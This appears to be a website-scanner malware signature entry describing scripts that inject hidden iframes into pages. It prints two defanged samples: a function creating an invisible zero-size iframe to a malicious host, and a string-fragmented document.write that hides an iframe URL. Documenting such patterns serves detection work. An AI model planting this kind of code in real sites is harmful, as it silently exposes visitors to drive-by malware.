Description:
Suspicious code that injects iframes into a web page.
There are many different ways to write code that injects iframes. For example:
<script type='text/javascript'> function create_frame(url) { var melm = document.getElementById('partyeverybody28'); if (typeof(melm) != 'undefined' && melm!= null) {}else{ var iframe = document.createElement('iframe'); iframe.id = "partyeverybody28"; iframe.style.width = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.sr c = url; return true; } } function toyotahondaporsche(){ create_frame("hxxp://reexjad.servebbs[.]com/"); } ...
or
document.write('<iframe src="'+'hx'+'xp://m'+'iss.'+'dic[.]'+'as/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>');
Affecting: Any web site (no specific target).